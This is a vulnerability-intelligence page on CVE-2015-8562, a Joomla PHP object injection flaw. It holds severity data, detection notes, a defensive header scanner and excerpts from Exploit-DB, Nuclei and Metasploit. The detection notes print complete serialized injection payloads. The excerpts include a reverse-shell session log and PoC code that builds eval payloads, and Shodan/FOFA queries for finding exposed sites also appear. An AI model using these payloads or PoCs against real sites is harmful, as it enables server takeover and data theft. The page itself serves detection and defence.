CVE-2015-8562
Published 2015-12-16
CVE-2015-8562: Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent…
Priority: P279 · high · 7.5 (CVSS 2.0) · AV:N/AC:L/Au:N/C:P/I:P/A:P
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 98.28% (99.9th percentile)
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.
Affected
95 ranges · showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | joomla_! | — | — |
Detection & IOCs (extracted from sources)
- other: `}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";`
- ua123: `}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`
- Detect exploit attempts by inspecting the HTTP User-Agent header for the PHP object injection serialized payload prefix `}__test|O:21:"JDatabaseDriverMysqli"`
- The exploit terminates the serialized payload with the UTF-8 multibyte sequence `\xf0\xfd\xfd\xfd` to truncate session data stored in the database; detect this byte sequence in HTTP headers
- Some PoC variants deliver the payload via the X-Forwarded-For header instead of User-Agent; monitor both headers for serialized PHP object strings
- The exploit uses `assert` as the cache_name_function within the serialized object to achieve code execution; look for the string `cache_name_function";s:6:"assert"` in HTTP header values
- Presence of dropped file /tmp/newhnewh.py on a Joomla server indicates successful exploitation via the reverse shell stage of the CVE-2015-8562 PoC
- Exploitation requires PHP versions before 5.4.45, 5.5.29, or 5.6.13; correlate vulnerable PHP version with Joomla detections to prioritize alerts
- Shodan/FOFA fingerprints for exposed Joomla instances: search for http.html:"joomla! - open source content management" or body="joomla! - open source content management"
- The exploit only works against PHP versions before 5.4.45, 5.5.29, or 5.6.13; patched PHP versions stop deserialisation on the first error, preventing exploitation even on unpatched Joomla
- The PHP patch was backported into specific Ubuntu and Debian package versions (Ubuntu: 5.5.9+dfsg-1ubuntu4.13 / 5.3.10-1ubuntu3.20; Debian: 5.4.45-0+deb7u1); systems running these distro packages may be protected at the PHP level even without a Joomla upgrade
- The vulnerability affects all Joomla versions from 1.5.0 through 3.4.5; the attack vector is the session table in the database where user-supplied headers are stored, and the payload executes when the session is read back
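As an added defender-side example (not code from this page's sources or from any of the tools listed below), the following Python applies the detection notes above to raw HTTP request headers: it checks both delivery channels named here, User-Agent and X-Forwarded-For, for the serialized-payload prefix, the `assert` cache_name_function marker and the `\xf0\xfd\xfd\xfd` truncation bytes, and falls back to a generic serialized-PHP-object shape so renamed variants still surface. The three request samples are constructed for the example; the host name and the abbreviated payload fragments are placeholders, not captured traffic.

```python
import re

# Indicator strings taken from the detection notes on this page.
PAYLOAD_PREFIX = b'}__test|O:21:"JDatabaseDriverMysqli"'
ASSERT_MARKER = b'cache_name_function";s:6:"assert"'
TRUNCATION_BYTES = b"\xf0\xfd\xfd\xfd"
# Generic shape of any serialized PHP object: O:<len>:"<class>":<count>:{
SERIALIZED_OBJECT = re.compile(rb'O:\d+:"[\w\\]+":\d+:\{')
# Both delivery channels named on this page.
WATCHED_HEADERS = ("user-agent", "x-forwarded-for")


def parse_request_head(raw: bytes) -> dict:
    """Split the header block of a raw HTTP request into {lowercase-name: value}.

    Values are kept as bytes so the multibyte truncation sequence is matched
    exactly rather than being altered by a text decode.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers[name.strip().lower().decode("ascii", "replace")] = value.strip()
    return headers


def scan_headers(headers: dict) -> list:
    """Return '<header>: <indicator>' strings for every watched header that matches.

    The three page-specific indicators are reported individually; the generic
    serialized-object check only fires when none of them did, so it surfaces
    variants that change class names or drop the usual prefix.
    """
    findings = []
    for name in WATCHED_HEADERS:
        value = headers.get(name)
        if value is None:
            continue
        before = len(findings)
        if PAYLOAD_PREFIX in value:
            findings.append(f"{name}: joomla_object_injection_prefix")
        if ASSERT_MARKER in value:
            findings.append(f"{name}: assert_cache_name_function")
        if TRUNCATION_BYTES in value:
            findings.append(f"{name}: utf8_truncation_sequence")
        if len(findings) == before and SERIALIZED_OBJECT.search(value):
            findings.append(f"{name}: generic_serialized_php_object")
    return findings


# Constructed sample requests (not captured traffic). The attack sample keeps only
# the fragments the indicators above look for; the rest of the payload is elided.
BENIGN_REQUEST = (
    b"GET /index.php HTTP/1.1\r\n"
    b"Host: joomla.example\r\n"
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0\r\n"
    b"X-Forwarded-For: 203.0.113.7\r\n"
    b"\r\n"
)
UA_ATTACK_REQUEST = (
    b"GET /index.php HTTP/1.1\r\n"
    b"Host: joomla.example\r\n"
    b'User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{...'
    b'cache_name_function";s:6:"assert";...}' + TRUNCATION_BYTES + b"\r\n"
    b"\r\n"
)
XFF_VARIANT_REQUEST = (
    b"GET /index.php HTTP/1.1\r\n"
    b"Host: joomla.example\r\n"
    b"User-Agent: curl/7.47.0\r\n"
    b'X-Forwarded-For: 198.51.100.9}__x|O:8:"stdClass":0:{}\r\n'
    b"\r\n"
)


def scan_request(raw: bytes) -> list:
    """Parse a raw request head and scan its watched headers in one call."""
    return scan_headers(parse_request_head(raw))


if __name__ == "__main__":
    for label, raw in (("benign", BENIGN_REQUEST),
                       ("ua-attack", UA_ATTACK_REQUEST),
                       ("xff-variant", XFF_VARIANT_REQUEST)):
        print(label, scan_request(raw) or "clean")
```

The generic check is deliberately the last resort: a legitimate header will almost never contain `O:<n>:"<class>":<n>:{`, but when it does the alert carries the weaker label, so it can be triaged separately from the page-specific markers. As the notes above say, matching the server's PHP version against the patched releases (5.4.45, 5.5.29, 5.6.13) tells you whether a hit could have succeeded at all.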
CVSS provenance
- NVD (v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
- VulnCheck: 7.5 HIGH
GHSA
GHSA-pccq-v233-rx3q: Joomla! 1
ghsa_unreviewed · 2022-05-14 · CVE-2015-8562 [HIGH] · CWE-20
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.
VulnCheck
Joomla! Joomla! Improper Input Validation
vulncheck · 2015 · CVSS 7.5 · CVE-2015-8562 [HIGH]
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.
Affected: Joomla! Joomla!
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2015-8562; https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities--exploits--and-malware-driving-attack-campaigns-in-july-2019; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://go.catonetworks.com/rs/245-RJK-441/images/Security%20Quarterly%20Report.pdf; h
No detection rules found.
Exploit-DB
Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution
exploitdb · 2015-12-18 · CVSS 7.5 · CVE-2015-8566 [HIGH]
Joomla! 1.5
```python
[+] Spawning reverse shell....
Listening on [0.0.0.0] (family 0, port 4444)
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/$
'''
import requests
import subprocess
import argparse
import sys
import base64


# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com)
def get_url(url, user_agent):
    headers = {
        'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3',  # Change default UA for Requests
        'x-forwarded-for': user_agent  # X-Forwarded-For header instead of UA
    }
    cookies = requests.get(url, headers=headers).cookies
    for _ in range(3):
        response = requests.get(url, headers=headers
```
Exploit-DB
Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution
exploitdb · 2015-12-15 · CVE-2015-8562
```python
'''
Simple PoC for Joomla Object Injection.
Gary @ Sec-1 ltd
http://www.sec-1.com/
'''
import requests  # easy_install requests


def get_url(url, user_agent):
    headers = {
        'User-Agent': user_agent
    }
    cookies = requests.get(url, headers=headers).cookies
    for _ in range(3):
        response = requests.get(url, headers=headers, cookies=cookies)
    return response


def php_str_noquotes(data):
    "Convert string to chr(xx).chr(xx) for use in php"
    encoded = ""
    for char in data:
        encoded += "chr({0}).".format(ord(char))
    return encoded[:-1]


def generate_payload(php_payload):
    php_payload = "eval({0})".format(php_str_noquotes(php_payload))
    terminate = '\xf0\xfd\xfd\xfd';
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:
```
Nuclei
Joomla HTTP Header Unauthenticated - Remote Code Execution
nuclei · CVSS 7.5 · CVE-2015-8562 [HIGH]
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015
Template:
```yaml
id: CVE-2015-8562
info:
  name: Joomla HTTP Header Unauthenticated - Remote Code Execution
  author: kairos-hk,bolkv,n0ming,RoughBoy0723
  description: |
    Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015
  impact: |
    Attackers can execute arbitrary PHP code on the server through PHP object injection, leading to complete server compromise and potential data breach.
  r
```
Metasploit
Joomla HTTP Header Unauthenticated Remote Code Execution
metasploit
Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user-supplied headers in the database's session table it is possible to truncate the input by sending a UTF-8 character. The custom-created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42 · 2021-04-12 · CVSS 7.5 · CVE-2020-28188 [HIGH]
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a deep dive into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42 · 2021-04-12 · CVSS 7.5 · [HIGH]
Authors: Lei Xu, Yue Guan, Vaibhav Singhal
Published: April 12, 2021
Tags: Malware, Trend Reports, Vulnerabilities, Botnet, DDoS, Exploit kit, IoT, Network security trends
References
- http://packetstormsecurity.com/files/134949/Joomla-HTTP-Header-Unauthenticated-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/135100/Joomla-3.4.5-Object-Injection.html
- http://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rce
- http://www.securityfocus.com/archive/1/537219/100/0/threaded
- http://www.securityfocus.com/bid/79195
- https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html
- https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html
- https://www.exploit-db.com/exploits/38977/
- https://www.exploit-db.com/exploits/39033/